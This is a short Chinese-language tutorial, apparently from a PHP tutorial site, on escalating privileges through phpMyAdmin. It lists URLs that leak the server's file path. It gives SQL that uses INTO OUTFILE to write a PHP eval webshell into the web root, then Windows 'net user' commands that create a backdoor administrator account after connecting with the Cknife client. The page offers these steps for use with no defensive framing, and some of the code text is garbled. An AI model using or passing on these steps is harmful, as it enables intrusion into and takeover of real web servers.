怎么利用phpMyAdmin提權(quán)

3910

下面由phpMyAdmin教程欄目給大家介紹利用phpmyadmin提權(quán)的方法,希望對需要的朋友有所幫助!

利用phpMyAdmin提權(quán)

爆路徑

  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpMyAdmin/index.php?lang[]=1
  • /phpMyAdmin/phpinfo.php
  • /load_file()
  • /phpmyadmin/themes/darkblue_orange/layout.inc.php
  • /phpmyadmin/libraries/select_lang.lib.php
  • /phpmyadmin/libraries/lect_lang.lib.php
  • /phpmyadmin/libraries/mcrypt.lib.php

得到物理路徑 C:wampwwwphpmyadminthemesdarkblue_orangelayout.inc.php

寫馬

立即學(xué)習(xí)PHP免費學(xué)習(xí)筆記(深入)”;

Create?TABLE?a?(cmd?text?NOT?NULL); Insert?INTO?a?(cmd)?VALUES("<?php  eval($_POST[Cknife]);?>"); select?cmd?from?a?into?outfile?"C:/wamp/www/phpmyadmin/d.php"; Drop?TABLE?IF?EXISTS?a;

獲得webshell

最后用Cknife連接,創(chuàng)建帳戶并添加到管理員用戶組
net user admin admin /add
net localgroup administrator admin /add

? 版權(quán)聲明
THE END
數(shù)據(jù)庫
# phpMyAdmin
喜歡就支持一下吧
點贊10 分享